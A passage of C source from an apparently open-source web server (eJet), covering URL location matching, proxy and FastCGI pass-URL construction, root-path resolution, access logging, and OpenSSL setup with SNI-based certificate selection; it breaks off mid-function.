ret = pcre_exec(arr_value(host->regex_list, i), NULL, buf, strlen(buf), 0, 0, ovec, 36);
if (ret > 0) {
#endif
ploc = arr_value(host->regex_loc_list, i);
msg->ploc = ploc;
msg->matchnum = 0;
#ifdef UNIX
for (j = 0; j < 16; j++) {
if (pmat[j].rm_so >= 0) {
msg->matchstr[msg->matchnum].p = msg->docuri->path + pmat[j].rm_so;
msg->matchstr[msg->matchnum].len = pmat[j].rm_eo - pmat[j].rm_so;
msg->matchnum++;
continue;
}
break;
}
#endif
#if defined(_WIN32) || defined(_WIN64)
for (j = 0; j < ret; j++) {
msg->matchstr[msg->matchnum].p = msg->docuri->path + ovec[2 * j];
msg->matchstr[msg->matchnum].len = ovec[2 * j + 1] - ovec[2 * j];
msg->matchnum++;
}
#endif
goto retloc;
}
}
msg->ploc = host->defaultloc;
ploc = msg->ploc;
msg->matchnum = 1;
msg->matchstr[0].p = msg->docuri->path; // matching '/'
msg->matchstr[0].len = 1;
retloc:
/* script is interpreted and executed here */
http_script_exec(msg);
return ploc;
}
int http_loc_passurl_get (void * vmsg, int servtype, char * url, int urllen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPLoc * ploc = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pmatend = NULL;
if (!msg) return -1;
if (!url) return -2;
url[0] = '\0';
ploc = (HTTPLoc *)msg->ploc;
if (!ploc) return -3;
/* when location type is not proxy or fastcgi, just return */
if (ploc->type != servtype) {
return -10;
}
if (ploc->passurl == NULL) {
return -11;
}
if (servtype == SERV_FASTCGI) {
str_secpy(url, urllen, ploc->passurl, strlen(ploc->passurl));
return strlen(url);
}
if (ploc->matchtype == MATCH_REGEX_CASE || ploc->matchtype == MATCH_REGEX_NOCASE) {
/* when matching type is regex matching, subsitude
$num with matching substring */
http_var_copy(msg, ploc->passurl, strlen(ploc->passurl),
url, urllen, msg->matchstr, msg->matchnum, "passurl", 7);
} else {
/* when matching type is non-regex matching, remove the matching
substring of req_path and append the rest of req_path to passurl */
str_secpy(url, urllen, ploc->passurl, str_len(ploc->passurl));
pbgn = msg->docuri->path;
pend = msg->docuri->path + msg->docuri->pathlen;
if (msg->matchnum > 0) {
poct = msg->matchstr[0].p;
pmatend = poct + msg->matchstr[0].len;
if (poct > pbgn)
str_secat(url, urllen - str_len(url), pbgn, poct - pbgn);
if (pmatend < pend)
str_secat(url, urllen - str_len(url), pmatend, pend - pmatend);
} else {
str_secat(url, urllen - str_len(url), pbgn, pend - pbgn);
}
}
if (msg->req_query && msg->req_querylen > 0) {
if (memchr(url, '?', str_len(url)) == NULL) {
str_secat(url, urllen - str_len(url), "?", 1);
str_secat(url, urllen - str_len(url), msg->req_query, msg->req_querylen);
} else {
/*str_secat(url, urllen - str_len(url), "&", 1);
str_secat(url, urllen - str_len(url), msg->req_query, msg->req_querylen);*/
}
}
return strlen(url);
}
char * http_root_path (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPHost * phost = NULL;
HTTPLoc * ploc = NULL;
if (!msg) return ".";
if (!msg->ploc) {
if (msg->phost) {
phost = (HTTPHost *)msg->phost;
return phost->root;
}
return ".";
}
ploc = (HTTPLoc *)msg->ploc;
return ploc->root;
}
int http_real_file (void * vmsg, char * path, int len)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPLoc * ploc = NULL;
char * root = NULL;
int i, slen = 0;
int retlen = 0;
if (!msg) return -1;
if (!path || len <= 0) return -2;
root = http_root_path(msg);
retlen = str_len(root);
if (path && len > 0)
str_secpy(path, len, root, retlen);
if (msg->docuri->path && msg->docuri->pathlen > 0) {
if (path) {
slen = strlen(path);
str_secpy(path + slen, len - slen, msg->docuri->path, msg->docuri->pathlen);
}
retlen += msg->docuri->pathlen;
} else {
if (path) {
slen = strlen(path);
str_secpy(path + slen, len - slen, "/", 1);
}
retlen += 1;
}
if (path && file_is_dir(path) && (ploc = msg->ploc)) {
slen = strlen(path);
for (i = 0; i < (int)ploc->indexnum; i++) {
snprintf(path + slen, len - slen, "%s", ploc->index[i]);
if (file_is_regular(path)) {
return strlen(path);
}
}
path[slen] = '\0';
}
if (path) return strlen(path);
return retlen;
}
int http_real_path (void * vmsg, char * path, int len)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char * root = NULL;
int slen = 0;
int retlen = 0;
if (!msg) return -1;
if (!path || len <= 0) return -2;
root = http_root_path(msg);
retlen = str_len(root);
if (path && len > 0)
str_secpy(path, len, root, retlen);
if (path) {
slen = strlen(path);
str_secpy(path + slen, len - slen, msg->docuri->dir, msg->docuri->dirlen);
}
retlen += msg->docuri->dirlen;
if (path) return strlen(path);
return retlen;
}
void * http_prefix_loc (void * vhl, char * hostn, int hostlen, char * matstr, int len,
char * root, void * cbfunc, void * cbobj, void * tplfile)
{
HTTPListen * hl = (HTTPListen *)vhl;
HTTPHost * host = NULL;
HTTPLoc * ploc = NULL;
char * ptmp = NULL;
int i, num;
if (!hl) return NULL;
if (!matstr) return NULL;
if (len < 0) len = strlen(matstr);
if (len <= 0) return NULL;
host = http_host_create(hl, hostn, hostlen, NULL, NULL, NULL, NULL);
if (!host) return NULL;
EnterCriticalSection(&host->hostCS);
num = arr_num(host->prefix_loc_list);
for (i = 0; i < num; i++) {
ploc = arr_value(host->prefix_loc_list, i);
if (!ploc) continue;
if (ploc->path && str_len(ploc->path) == len &&
str_ncmp(ploc->path, matstr, len) == 0)
{
break;
}
}
if (!ploc || i >= num) {
ploc = http_loc_alloc(matstr, len, 1, MATCH_PREFIX, SERV_CALLBACK, root);
if (!ploc) {
LeaveCriticalSection(&host->hostCS);
return NULL;
}
ploc->indexnum = 2;
ploc->index[0] = "index.html";
ploc->index[1] = "index.htm";
arr_push(host->prefix_loc_list, ploc);
actrie_add(host->prefix_actrie, ploc->path, -1, ploc);
} else {
ploc->matchtype = MATCH_PREFIX;
ploc->type |= SERV_CALLBACK;
if (root && strlen(root) > 0 && (ptmp = realpath(root, NULL))) {
str_secpy(ploc->root, sizeof(ploc->root)-1, ptmp, strlen(ptmp));
free(ptmp);
if (ploc->root[strlen(ploc->root) - 1] == '/')
ploc->root[strlen(ploc->root) - 1] = '\0';
}
}
LeaveCriticalSection(&host->hostCS);
ploc->cbfunc = cbfunc;
ploc->cbobj = cbobj;
ploc->tplfile = tplfile;
return ploc;
}
void * http_exact_loc (void * vhl, char * hostn, int hostlen, char * matstr, int len,
char * root, void * cbfunc, void * cbobj, void * tplfile)
{
HTTPListen * hl = (HTTPListen *)vhl;
HTTPHost * host = NULL;
HTTPLoc * ploc = NULL;
char * ptmp = NULL;
char buf[1024];
if (!hl) return NULL;
if (!matstr) return NULL;
if (len < 0) len = strlen(matstr);
if (len <= 0) return NULL;
host = http_host_create(hl, hostn, hostlen, NULL, NULL, NULL, NULL);
if (!host) return NULL;
str_secpy(buf, sizeof(buf)-1, matstr, len);
EnterCriticalSection(&host->hostCS);
ploc = ht_get(host->exact_loc_table, buf);
if (!ploc) {
ploc = http_loc_alloc(matstr, len, 1, MATCH_EXACT, SERV_CALLBACK, root);
if (!ploc) {
LeaveCriticalSection(&host->hostCS);
return NULL;
}
ht_set(host->exact_loc_table, ploc->path, ploc);
} else {
ploc->matchtype = MATCH_EXACT;
ploc->type |= SERV_CALLBACK;
if (root && strlen(root) > 0 && (ptmp = realpath(root, NULL))) {
str_secpy(ploc->root, sizeof(ploc->root)-1, ptmp, strlen(ptmp));
free(ptmp);
if (ploc->root[strlen(ploc->root) - 1] == '/')
ploc->root[strlen(ploc->root) - 1] = '\0';
}
}
LeaveCriticalSection(&host->hostCS);
ploc->cbfunc = cbfunc;
ploc->cbobj = cbobj;
ploc->tplfile = tplfile;
return ploc;
}
void * http_regex_loc (void * vhl, char * hostn, int hostlen, char * matstr, int len, int ignorecase,
char * root, void * cbfunc, void * cbobj, void * tplfile)
{
HTTPListen * hl = (HTTPListen *)vhl;
HTTPHost * host = NULL;
HTTPLoc * ploc = NULL;
#ifdef UNIX
regex_t * preg = NULL;
#endif
#if defined(_WIN32) || defined(_WIN64)
pcre * preg = NULL;
char * errstr = NULL;
int erroff = 0;
#endif
char * ptmp = NULL;
int i, num;
if (!hl) return NULL;
if (!matstr) return NULL;
if (len < 0) len = strlen(matstr);
if (len <= 0) return NULL;
host = http_host_create(hl, hostn, hostlen, NULL, NULL, NULL, NULL);
if (!host) return NULL;
EnterCriticalSection(&host->hostCS);
num = arr_num(host->regex_loc_list);
for (i = 0; i < num; i++) {
ploc = arr_value(host->regex_loc_list, i);
if (!ploc) continue;
if (ploc->path && str_len(ploc->path) == len &&
str_ncmp(ploc->path, matstr, len) == 0)
{
break;
}
}
if (!ploc || i >= num) {
ploc = http_loc_alloc(matstr, len, 1,
ignorecase ? MATCH_REGEX_NOCASE : MATCH_REGEX_CASE,
SERV_CALLBACK, root);
if (!ploc) {
LeaveCriticalSection(&host->hostCS);
return NULL;
}
arr_push(host->regex_loc_list, ploc);
#ifdef UNIX
preg = kzalloc(sizeof(regex_t));
if (ploc->matchtype == MATCH_REGEX_CASE) { //case censitive
regcomp(preg, ploc->path, REG_EXTENDED);
} else { //ignoring case
regcomp(preg, ploc->path, REG_EXTENDED | REG_ICASE);
}
#endif
#if defined(_WIN32) || defined(_WIN64)
if (ploc->matchtype == MATCH_REGEX_CASE) { //case censitive
preg = pcre_compile(ploc->path, 0, &errstr, &erroff, NULL);
} else { //ignoring case
preg = pcre_compile(ploc->path, PCRE_CASELESS, &errstr, &erroff, NULL);
}
#endif
arr_push(host->regex_list, preg);
} else {
ploc->matchtype = MATCH_PREFIX;
ploc->type |= SERV_CALLBACK;
if (root && strlen(root) > 0 && (ptmp = realpath(root, NULL))) {
str_secpy(ploc->root, sizeof(ploc->root)-1, ptmp, strlen(ptmp));
free(ptmp);
if (ploc->root[strlen(ploc->root) - 1] == '/')
ploc->root[strlen(ploc->root) - 1] = '\0';
}
}
LeaveCriticalSection(&host->hostCS);
ploc->cbfunc = cbfunc;
ploc->cbobj = cbobj;
ploc->tplfile = tplfile;
return ploc;
}
<|start_filename|>include/http_fcgi_srv.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_FCGI_SRV_H_
#define _HTTP_FCGI_SRV_H_
#ifdef __cplusplus
extern "C" {
#endif
#define t_fcgi_srv_life 2201
typedef struct http_fcgi_srv {
/* fpmsrv is UNIX-socket address or domain name of FPM server.
unix:/dev/shm/php-cgi.sock
fastcgi://127.0.0.1:9000
*/
char cgisrv[256];
uint8 socktype; //0-TCP 1-Unix Socket
char unixsock[256];
char ip[41];
int port;
CRITICAL_SECTION msgCS;
uint16 msgid;
hashtab_t * msg_table;
void * msg_fifo;
int maxcon;
CRITICAL_SECTION conCS;
ulong conid;
rbtree_t * con_tree;
time_t stamp;
void * life_timer;
void * mgmt;
void * pcore;
} FcgiSrv, fcgi_srv_t;
int http_mgmt_fcgisrv_init (void * vmgmt);
int http_mgmt_fcgisrv_clean(void * vmgmt);
int http_mgmt_fcgisrv_add (void * vmgmt, void * vsrv);
void * http_mgmt_fcgisrv_get (void * vmgmt, char * cgisrv);
void * http_mgmt_fcgisrv_del (void * vmgmt, char * cgisrv);
void * http_fcgisrv_open (void * vmgmt, char * cgisrv, int maxcon);
int http_fcgisrv_close(void * vsrv);
uint16 http_fcgisrv_get_msgid (void * vsrv);
ulong http_fcgisrv_get_conid (void * vsrv);
void * http_fcgisrv_connect (void * vsrv);
int http_fcgisrv_msg_add (void * vsrv, void * vmsg);
void * http_fcgisrv_msg_get (void * vsrv, uint16 msgid);
void * http_fcgisrv_msg_del (void * vsrv, uint16 msgid);
int http_fcgisrv_msg_push (void * vsrv, void * vmsg);
void * http_fcgisrv_msg_pull (void * vsrv);
int http_fcgisrv_msg_num (void * vsrv);
int http_fcgisrv_con_add (void * vsrv, void * vpcon);
void * http_fcgisrv_con_get (void * vsrv, ulong conid);
void * http_fcgisrv_con_del (void * vsrv, ulong conid);
int http_fcgisrv_con_num (void * vsrv);
int http_fcgisrv_lifecheck (void * vsrv);
int http_fcgisrv_pump (void * vsrv, void * vobj, int event, int fdtype);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_header.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_HEADER_H_
#define _HTTP_HEADER_H_
#ifdef __cplusplus
extern "C" {
#endif
typedef struct HeaderUnit_ {
void * res[2];
char * name;
int namelen;
char * value;
int valuelen;
uint32 namepos;
uint32 valuepos;
frame_p frame;
void * next;
} HeaderUnit;
#define HUName(unit) ((char *)frameP((unit)->frame) + (unit)->namepos)
#define HUValue(unit) ((char *)frameP((unit)->frame) + (unit)->valuepos)
#define HUPos(frame, p) ((char *)(p) - (char *)frameP(frame))
HeaderUnit * hunit_alloc ();
int hunit_free (void * vhunit);
void hunit_void_free (void * vhunit);
int hunit_cmp_hunit_by_name(void * a, void * b);
ulong hunit_hash_func (void * key);
int hunit_cmp_key (void * a, void * b);
int hunit_set_hashfunc (hashtab_t * htab);
int hunit_add (hashtab_t * htab, char * name, int namelen, void * value);
HeaderUnit * hunit_get (hashtab_t * htab, char * name, int namelen);
HeaderUnit * hunit_del (hashtab_t * htab, char * name, int namelen);
HeaderUnit * hunit_get_from_list (arr_t * hlist, char * name, int namelen);
typedef int HeaderEncode (void * vmsg, HeaderUnit * unit);
typedef int HeaderDecode (void * vmsg, char * pbin, int binlen);
int http_header_add (void * vmsg, int type, char * name, int namelen, char * value, int valuelen);
int http_header_del (void * vmsg, int type, char * name, int namelen);
int http_header_delall (void * vmsg, int type);
HeaderUnit * http_header_get (void * vmsg, int type, char * name, int namelen);
HeaderUnit * http_header_get_index (void * vmsg, int type, int index);
int http_header_get_int (void * vmsg, int type, char * name, int namelen);
uint32 http_header_get_uint32 (void * vmsg, int type, char * name, int namelen);
long http_header_get_long (void * vmsg, int type, char * name, int namelen);
ulong http_header_get_ulong (void * vmsg, int type, char * name, int namelen);
int64 http_header_get_int64 (void * vmsg, int type, char * name, int namelen);
uint64 http_header_get_uint64 (void * vmsg, int type, char * name, int namelen);
int http_header_append (void * vmsg, int type, char * name, int namelen, char * value, int valuelen);
/* date string defined by RFC 822, updated by RFC 1123
Sun, 17 Dec 2000 08:21:33 GMT */
int http_header_append_date (void * vmsg, int type, char * name, int namelen, time_t dtval);
int http_header_append_int (void * vmsg, int type, char * name, int namelen, int ival);
int http_header_append_uint32 (void * vmsg, int type, char * name, int namelen, uint32 ival);
int http_header_append_long (void * vmsg, int type, char * name, int namelen, long ival);
int http_header_append_ulong (void * vmsg, int type, char * name, int namelen, ulong ival);
int http_header_append_int64 (void * vmsg, int type, char * name, int namelen, int64 ival);
int http_header_append_uint64 (void * vmsg, int type, char * name, int namelen, uint64 ival);
int http_entity_header_parse (void * vmsg, int type, char * pbyte, int len);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_log.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "http_mgmt.h"
#include "http_msg.h"
#include "http_variable.h"
#include "http_log.h"
void * http_log_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPLog * plog = NULL;
char key[128];
int keylen = 0;
char * value = NULL;
int vallen = 0;
int i, ret;
if (!mgmt) return NULL;
plog = kzalloc(sizeof(*plog));
if (!plog) return NULL;
sprintf(key, "http.access log.log2file"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&value, &vallen);
if (ret <= 0 || !value) plog->enable = 0;
if (value && strcasecmp(value, "on") == 0)
plog->enable = 1;
else
plog->enable = 0;
sprintf(key, "http.access log.log file"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&value, &vallen);
if (ret <= 0 || !value || vallen <= 0) {
plog->logfile = "./access.log";
} else {
plog->logfile = value;
file_dir_create(plog->logfile, 1);
}
plog->format = frame_new(256);
sprintf(key, "http.access log.format"); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&value, &vallen);
if (ret > 0 && value && vallen > 0) {
frame_put_nlast(plog->format, value, vallen);
frame_put_last(plog->format, ' ');
for (i = 1; i < ret; i++) {
sprintf(key, "http.access log.format[%d]", i); keylen = strlen(key);
ret = json_mgetP(mgmt->cnfjson, key, keylen, (void **)&value, &vallen);
if (ret > 0 && value && vallen > 0) {
frame_put_nlast(plog->format, value, vallen);
frame_put_last(plog->format, ' ');
}
}
} else {
frame_append(plog->format, "$remote_addr - [$datetime[createtime]] \"$request\" "
"\"$request_header[host]\" \"$request_header[referer]\" "
"\"$http_user_agent\" $status $bytes_recv $bytes_sent");
}
InitializeCriticalSection(&plog->logCS);
plog->loglen = 4096;
plog->logcont = kalloc(plog->loglen + 1);
plog->fp = fopen(plog->logfile, "a+");
plog->mgmt = mgmt;
tolog(1, "eJet - AccessLog '%s' init successfully.\n", plog->logfile);
return plog;
}
int http_log_clean (void * vlog)
{
HTTPLog * plog = (HTTPLog *)vlog;
if (!plog) return -1;
if (plog->fp) {
fclose(plog->fp);
plog->fp = NULL;
}
if (plog->format) {
frame_free(plog->format);
plog->format = NULL;
}
if (plog->logcont) {
kfree(plog->logcont);
plog->logcont = NULL;
}
DeleteCriticalSection(&plog->logCS);
kfree(plog);
tolog(1, "eJet - AccessLog resource freed.\n");
return 0;
}
int http_log_write (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HTTPLog * plog = NULL;
int ret = 0;
if (!msg) return -1;
//if (msg->proxied == 2) return 0;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return -2;
plog = (HTTPLog *)mgmt->httplog;
if (!plog) return -3;
if (!plog->fp) return -200;
ret = http_var_copy(msg, frameP(plog->format), frameL(plog->format),
NULL, 0, NULL, 0, NULL, 0);
if (ret < 0) return -100;
EnterCriticalSection(&plog->logCS);
if (ret > plog->loglen) {
plog->loglen = ret;
kfree(plog->logcont);
plog->logcont = kalloc(plog->loglen + 1);
}
ret = http_var_copy(msg, frameP(plog->format), frameL(plog->format),
plog->logcont, plog->loglen, NULL, 0, NULL, 0);
if (ret > 0) {
fprintf(plog->fp, "%s\n", plog->logcont);
fflush(plog->fp);
}
LeaveCriticalSection(&plog->logCS);
return ret;
}
<|start_filename|>src/http_ssl.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_mgmt.h"
#include "http_msg.h"
#include "http_con.h"
#include "http_listen.h"
#include "http_cli_io.h"
#include "http_srv_io.h"
#include "http_ssl.h"
#ifdef UNIX
#include <sys/mman.h>
#endif
#ifdef HAVE_OPENSSL
int ssl_conn_index;
int http_ssl_library_init ()
{
if (!SSL_library_init ()) {
tolog(1, "eJet - OpenSSL library init failed\n");
return -1;
}
OpenSSL_add_ssl_algorithms();
SSL_load_error_strings ();
ssl_conn_index = SSL_get_ex_new_index(0, NULL, NULL, NULL, NULL);
if (ssl_conn_index == -1) {
tolog(1, "eJet - OpenSSL: SSL_get_ex_new_index() failed\n");
return -2;
}
tolog(1, "eJet - OpenSSL library init successfully.\n");
return 0;
}
void * http_ssl_server_ctx_init (char * cert, char * prikey, char * cacert)
{
SSL_CTX * ctx = NULL;
struct stat stcert;
struct stat stkey;
struct stat stca;
if (!cert || file_stat(cert, &stcert) < 0)
return NULL;
if (!prikey || file_stat(prikey, &stkey) < 0)
return NULL;
ctx = SSL_CTX_new(SSLv23_method());
if (!ctx) return NULL;
/* load certificate and private key, verify the cert with private key */
if (SSL_CTX_use_certificate_file(ctx, cert, SSL_FILETYPE_PEM) <= 0) {
tolog(1, "eJet - ServerSSL: loading Certificate file %s failed\n", cert);
SSL_CTX_free(ctx);
return NULL;
}
if (SSL_CTX_use_PrivateKey_file(ctx, prikey, SSL_FILETYPE_PEM) <= 0) {
tolog(1, "eJet - ServerSSL: loading Private Key file %s failed\n", prikey);
SSL_CTX_free(ctx);
return NULL;
}
if (!SSL_CTX_check_private_key(ctx)) {
tolog(1, "eJet - ServerSSL: Certificate verify failed! Private Key %s DOES NOT "
"match Certificate %s\n", cert, prikey);
SSL_CTX_free(ctx);
return NULL;
}
if (cacert && file_stat(cacert, &stca) >= 0) {
if (SSL_CTX_load_verify_locations(ctx, cacert, NULL) != 1) {
tolog(1, "eJet - ServerSSL: load CAcert %s failed\n", cacert);
goto retctx;
}
if (SSL_CTX_set_default_verify_paths(ctx) != 1) {
tolog(1, "eJet - ServerSSL: SSL_ctx_set_default_verify_path failed\n");
goto retctx;
}
}
retctx:
if (SSL_CTX_set_tlsext_servername_callback(ctx, http_ssl_servername_select) == 0) {
tolog(1, "eJet - SSL: select servername by TLSEXT SNI failed.\n");
}
tolog(1, "eJet - SSL server load Cert <%s> PriKey <%s> CACert <%s> successfully\n", cert, prikey, cacert);
return ctx;
}
void * http_ssl_client_ctx_init (char * cert, char * prikey, char * cacert)
{
SSL_CTX * ctx = NULL;
struct stat stcert;
struct stat stkey;
struct stat stca;
uint8 hascert = 0;
uint8 haskey = 0;
ctx = SSL_CTX_new(SSLv23_client_method());
if (!ctx) return NULL;
if (cert && file_stat(cert, &stcert) >= 0) {
/* load certificate and private key, verify the cert with private key */
if (SSL_CTX_use_certificate_file(ctx, cert, SSL_FILETYPE_PEM) <= 0) {
tolog(1, "eJet - ClientSSL: loading Certificate file %s failed\n", cert);
SSL_CTX_free(ctx);
return NULL;
}
hascert = 1;
}
if (prikey && file_stat(prikey, &stkey) >= 0) {
if (SSL_CTX_use_PrivateKey_file(ctx, prikey, SSL_FILETYPE_PEM) <= 0) {
tolog(1, "eJet - ClientSSL: loading Private Key file %s failed\n", prikey);
SSL_CTX_free(ctx);
return NULL;
}
haskey = 1;
}
if (hascert && haskey && !SSL_CTX_check_private_key(ctx)) {
tolog(1, "eJet - ClientSSL: Certificate verify failed! Private Key %s DOES NOT "
"match Certificate %s\n", cert, prikey);
SSL_CTX_free(ctx);
return NULL;
}
if (cacert && file_stat(cacert, &stca) >= 0) {
if (SSL_CTX_load_verify_locations(ctx, cacert, NULL) != 1) {
tolog(1, "eJet - ClientSSL: load CAcert %s failed\n", cacert);
goto retctx;
}
if (SSL_CTX_set_default_verify_paths(ctx) != 1) {
tolog(1, "eJet - ClientSSL: SSL_ctx_set_default_verify_path failed\n");
goto retctx;
}
}
retctx:
return ctx;
}
int http_ssl_ctx_free (void * vctx)
{
SSL_CTX * ctx = (SSL_CTX *)vctx;
if (!ctx) return -1;
SSL_CTX_free(ctx);
tolog(1, "eJet - SSL server ctx freed.\n");
return 0;
}
SSL * http_ssl_new (SSL_CTX * ctx, void * vcon)
{
SSL * ssl = NULL;
HTTPCon * pcon = (HTTPCon *)vcon;
void * pdev = NULL;
if (!ctx || !pcon || !pcon->pdev) return NULL;
ssl = SSL_new(ctx);
if (!ssl) {
tolog(1, "eJet - SSL: createing SSL instance failed\n");
return NULL;
}
pdev = pcon->pdev;
SSL_set_fd(ssl, iodev_fd(pdev));
if (iodev_fdtype(pdev) == FDT_ACCEPTED) {
SSL_set_accept_state(ssl);
} else if (iodev_fdtype(pdev) == FDT_CONNECTED) {
SSL_set_connect_state(ssl);
}
if (SSL_set_ex_data(ssl, ssl_conn_index, (void *)pcon) == 0) {
tolog(1, "eJet - SSL: SSL_set_ex_data() failed");
}
return ssl;
}
int http_ssl_free (SSL * ssl)
{
if (!ssl) return -1;
SSL_shutdown(ssl);
SSL_free(ssl);
return 0;
}
void * http_con_from_ssl (SSL * ssl)
{
if (!ssl) return NULL;
return SSL_get_ex_data(ssl, ssl_conn_index);
}
/* before SSL handshake, TCP sends 'Client Hello' with servername to web server.
The servername will be received and indicated to callback for appropriate
certificate and private key, called SNI mechanism in TLS spec. Multiple
certificates can be used for different host-name in one listen port. */
int http_ssl_servername_select (SSL * ssl, int * ad, void * arg)
{
HTTPCon * pcon = NULL;
HTTPListen * hl = NULL;
HTTPHost * host = NULL;
char * servername = NULL;
SSL_CTX * sslctx = NULL;
if (!ssl) return SSL_TLSEXT_ERR_NOACK;
servername = (char *)SSL_get_servername(ssl, TLSEXT_NAMETYPE_host_name);
if (!servername)
return SSL_TLSEXT_ERR_NOACK;
pcon = SSL_get_ex_data(ssl, ssl_conn_index);
if (!pcon)
return SSL_TLSEXT_ERR_NOACK;
if (!pcon->ssl_link || pcon->ssl_handshaked)
return SSL_TLSEXT_ERR_NOACK;
hl = (HTTPListen *)pcon->hl;
if (!hl)
return SSL_TLSEXT_ERR_NOACK;
host = http_listen_host_get(hl, servername);
if (!host)
return SSL_TLSEXT_ERR_NOACK;
if (host->sslctx == NULL)
return SSL_TLSEXT_ERR_NOACK;
sslctx = (SSL_CTX *)host->sslctx;
SSL_set_SSL_CTX(ssl, sslctx);
SSL_set_verify(ssl, SSL_CTX_get_verify_mode(sslctx),
SSL_CTX_get_verify_callback(sslctx));
SSL_set_verify_depth(ssl, SSL_CTX_get_verify_depth(sslctx));
#if OPENSSL_VERSION_NUMBER >= 0x009080dfL
/* only in 0.9.8m+ */
SSL_clear_options(ssl, SSL_get_options(ssl) & ~SSL_CTX_get_options(sslctx));
#endif
SSL_set_options(ssl, SSL_CTX_get_options(sslctx));
#ifdef SSL_OP_NO_RENEGOTIATION
SSL_set_options(ssl, SSL_OP_NO_RENEGOTIATION);
#endif
tolog(1, "eJet - SSL select server name %s successfully\n", servername);
return SSL_TLSEXT_ERR_OK;
}
#endif
int http_ssl_accept (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
#ifdef HAVE_OPENSSL
int acret = 0;
int ret;
if (!pcon) return -1;
if (!pcon->ssl_link || !pcon->ssl)
return http_cli_recv(pcon);
if (pcon->ssl_handshaked) {
return http_cli_recv(pcon);
}
time(&pcon->stamp);
acret = SSL_accept(pcon->ssl);
if (acret == 1) {
pcon->ssl_handshaked = 1;
if (pcon->rcv_state == HTTP_CON_SSL_HANDSHAKING)
pcon->rcv_state = HTTP_CON_READY;
tolog(1, "eJet - SSL accept %s:%d successfully. Using cipher: %s\n",
pcon->srcip, pcon->srcport, SSL_get_cipher(pcon->ssl));
return http_cli_recv(pcon);
}
ret = SSL_get_error(pcon->ssl, acret);
switch (ret) {
case SSL_ERROR_WANT_READ:
/* waiting clifd READ event */
return 0;
case SSL_ERROR_WANT_WRITE:
iodev_add_notify(pcon->pdev, RWF_WRITE);
/* waiting clifd WRITE event */
return 0;
case SSL_ERROR_SSL:
case SSL_ERROR_SYSCALL:
default:
tolog(1, "eJet - SSL accept %s:%d but handshake failed!\n", pcon->srcip, pcon->srcport);
http_con_close(pcon);
break;
}
return 0;
#else
return http_cli_recv(pcon);
#endif
}
int http_ssl_connect (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
#ifdef HAVE_OPENSSL
int conret = 0;
int ret;
if (!pcon) return -1;
if (!pcon->ssl_link || !pcon->ssl)
return http_srv_send(pcon);
if (pcon->ssl_handshaked) {
return http_srv_send(pcon);
}
time(&pcon->stamp);
conret = SSL_connect(pcon->ssl);
if (conret == 1) {
pcon->ssl_handshaked = 1;
if (pcon->snd_state == HTTP_CON_SSL_HANDSHAKING)
pcon->snd_state = HTTP_CON_SEND_READY;
tolog(1, "eJet - SSL connect %s:%d successfully! Using cipher: %s\n",
pcon->dstip, pcon->dstport, SSL_get_cipher(pcon->ssl));
return http_srv_send(pcon);
}
ret = SSL_get_error(pcon->ssl, conret);
switch (ret) {
case SSL_ERROR_WANT_READ:
/* waiting srvfd READ event */
return 0;
case SSL_ERROR_WANT_WRITE:
iodev_add_notify(pcon->pdev, RWF_WRITE);
/* waiting srvfd WRITE event */
return 0;
case SSL_ERROR_SSL:
case SSL_ERROR_SYSCALL:
default:
tolog(1, "eJet - SSL connect %s:%d but handshake failed!\n", pcon->srcip, pcon->srcport);
http_con_close(pcon);
break;
}
return 0;
#else
return http_srv_send(pcon);
#endif
}
int http_con_read (void * vcon, frame_p frm, int * num, int * err)
{
HTTPCon * pcon = (HTTPCon *)vcon;
#ifdef HAVE_OPENSSL
uint8 buf[524288];
int size = sizeof(buf);
int ret = 0, readLen = 0;
int sslerr = 0;
#endif
if (!pcon) return -1;
#ifdef HAVE_OPENSSL
if (!pcon->ssl_link)
return frame_tcp_nbzc_recv(pcon->rcvstream, iodev_fd(pcon->pdev), num, err);
if (!pcon->ssl) return -2;
for (readLen = 0; ;) {
ret = SSL_read(pcon->ssl, buf, size);
if (ret > 0) {
readLen += ret;
if (frm) frame_put_nlast(frm, buf, ret);
continue;
}
sslerr = SSL_get_error(pcon->ssl, ret);
if (num) *num = readLen;
if (ret == 0) {
if (sslerr == SSL_ERROR_ZERO_RETURN) {
if (err) *err = EBADF;
return -20;
} else {
if (err) *err = EBADF;
return -30;
}
} else { //ret < 0
if (sslerr == SSL_ERROR_WANT_READ) {
if (err) *err = EAGAIN;
break;
} else if (sslerr == SSL_ERROR_WANT_WRITE) {
iodev_add_notify(pcon->pdev, RWF_WRITE);
if (err) *err = EAGAIN;
break;
} else if (sslerr == SSL_ERROR_SSL) {
if (err) *err = EPROTO;
} else if (sslerr == SSL_ERROR_SYSCALL) {
if (err) *err = errno;
if (errno == EAGAIN || errno == EWOULDBLOCK)
break;
} else {
if (err) *err = EINVAL;
}
return -30;
}
}
if (num) *num = readLen;
return readLen;
#else
